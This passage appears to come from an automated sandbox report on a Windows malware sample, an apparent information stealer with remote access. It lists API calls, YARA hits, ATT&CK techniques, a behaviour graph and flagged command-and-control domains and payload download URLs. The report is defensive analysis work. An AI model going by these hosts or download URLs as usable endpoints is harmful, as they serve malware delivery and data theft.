                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0043B368
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_0043B645
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_0043B875
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0215B271
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_02155034
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_02155427
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0215B4E9
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0215B534
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0215B5CF
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_0215BADC
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0215BBA9
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_0215B8A3
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_0215B8AC
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0215B9D5
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.8BB0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.8BB0.tmp.exe.2500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.8BB0.tmp.exe.2500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.8BB0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.8BB0.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.8BB0.tmp.exe.2500000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.3.8BB0.tmp.exe.2500000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.8BB0.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02141B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02141B33
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02140E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02140E5D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Native API
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Screen Capture
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                12
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager31
                Security Software Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDS1
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture124
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                Obfuscated Files or Information
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                Software Packing
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync2
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576510 Sample: DG55Gu1yGM.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 10 other signatures 2->50 8 DG55Gu1yGM.exe 1 17 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49705, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 104.21.56.70, 443, 49704 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\8BB0.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (changes PE section rights) 8->52 54 Detected unpacking (overwrites its own PE header) 8->54 13 8BB0.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 immureprech.biz 104.131.68.180, 443, 49706 DIGITALOCEAN-ASNUS United States 13->36 38 deafeninggeh.biz 45.77.249.79, 443, 49708 AS-CHOOPAUS United States 13->38 40 steamcommunity.com 104.121.10.34, 443, 49715 AKAMAI-ASUS United States 13->40 56 Detected unpacking (changes PE section rights) 13->56 58 Detected unpacking (overwrites its own PE header) 13->58 60 Machine Learning detection for dropped file 13->60 17 WerFault.exe 19 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                DG55Gu1yGM.exe43%VirustotalBrowse
                DG55Gu1yGM.exe42%ReversingLabsWin32.Rootkit.BootkitX
                DG55Gu1yGM.exe100%AviraHEUR/AGEN.1306956
                DG55Gu1yGM.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://176.113.115.19/ScreenUpdateSync.exed0%Avira URL Cloudsafe
                https://debonairnukk.xyz/apix100%Avira URL Cloudmalware
                http://176.113.115.19/ScreenUpdateSync.exea0%Avira URL Cloudsafe
                http://176.113.115.19/ScreenUpdateSync.exex0%Avira URL Cloudsafe
                https://wrathful-jammy.cyou/api0100%Avira URL Cloudmalware
                https://sordid-snaked.cyou/100%Avira URL Cloudmalware
                https://post-to-me.com/track_prt.php?sub=0&cc=DEk100%Avira URL Cloudmalware
                https://immureprech.biz/apiR100%Avira URL Cloudmalware
                https://wrathful-jammy.cyou/H100%Avira URL Cloudmalware
                https://sordid-snaked.cyou/api9100%Avira URL Cloudmalware
                http://176.113.115.19/ScreenUpdateSync.exe$0%Avira URL Cloudsafe
                http://176.113.115.19/ScreenUpdateSync.exeZ00%Avira URL Cloudsafe
                http://176.113.115.19/ScreenUpdateSync.exe00%Avira URL Cloudsafe
                http://176.113.115.19/ScreenUpdateSync.exeR80%Avira URL Cloudsafe
                https://diffuculttan.xyz/api5100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                post-to-me.com
                104.21.56.70
                truefalse
                  high
                  steamcommunity.com
                  104.121.10.34
                  truefalse
                    high
                    immureprech.biz
                    104.131.68.180
                    truefalse
                      high
                      deafeninggeh.biz
                      45.77.249.79
                      truefalse
                        high
                        sordid-snaked.cyou
                        unknown
                        unknownfalse
                          high
                          diffuculttan.xyz
                          unknown
                          unknownfalse
                            high
                            effecterectz.xyz
                            unknown
                            unknownfalse
                              high
                              awake-weaves.cyou
                              unknown
                              unknownfalse
                                high
                                wrathful-jammy.cyou
                                unknown
                                unknownfalse
                                  high
                                  debonairnukk.xyz
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      high
                                      deafeninggeh.bizfalse
                                        high
                                        effecterectz.xyzfalse
                                          high
                                          wrathful-jammy.cyoufalse
                                            high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              high
                                              awake-weaves.cyoufalse
                                                high
                                                immureprech.bizfalse
                                                  high
                                                  https://immureprech.biz/apifalse
                                                    high
                                                    debonairnukk.xyzfalse
                                                      high
                                                      diffuculttan.xyzfalse
                                                        high
                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                          high
                                                          https://deafeninggeh.biz/apifalse
                                                            high
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://player.vimeo.com8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://steamcommunity.com/?subsection=broadcasts8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://debonairnukk.xyz/apix8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://store.steampowered.com/subscriber_agreement/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.gstatic.cn/recaptcha/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://wrathful-jammy.cyou/api08BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://176.113.115.19/ScreenUpdateSync.exeaDG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://176.113.115.19/ScreenUpdateSync.exedDG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://176.113.115.19/ScreenUpdateSync.exeDG55Gu1yGM.exe, DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.valvesoftware.com/legal.htm8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.youtube.com8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://sordid-snaked.cyou/api98BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af68BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://176.113.115.19/ScreenUpdateSync.exexDG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://s.ytimg.com;8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=18BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://steam.tv/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://post-to-me.com/track_prt.php?sub=&cc=DEDG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://store.steampowered.com/privacy_agreement/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://wrathful-jammy.cyou/8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://immureprech.biz/apiR8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/points/shop/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sketchfab.com8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://lv.queniujq.cn8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.youtube.com/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEkDG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        https://store.steampowered.com/privacy_agreement/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://post-to-me.com/track_prt.php?sub=DG55Gu1yGM.exefalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/recaptcha/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://checkout.steampowered.com/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://post-to-me.com/DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/;8BB0.tmp.exe, 00000002.00000002.2550654344.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://wrathful-jammy.cyou/H8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/about/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/my/wishlist/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://help.steampowered.com/en/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/market/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/news/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://recaptcha.net/recaptcha/;8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/discussions/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://sordid-snaked.cyou/8BB0.tmp.exe, 00000002.00000003.2287094068.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000094F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://store.steampowered.com/stats/8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
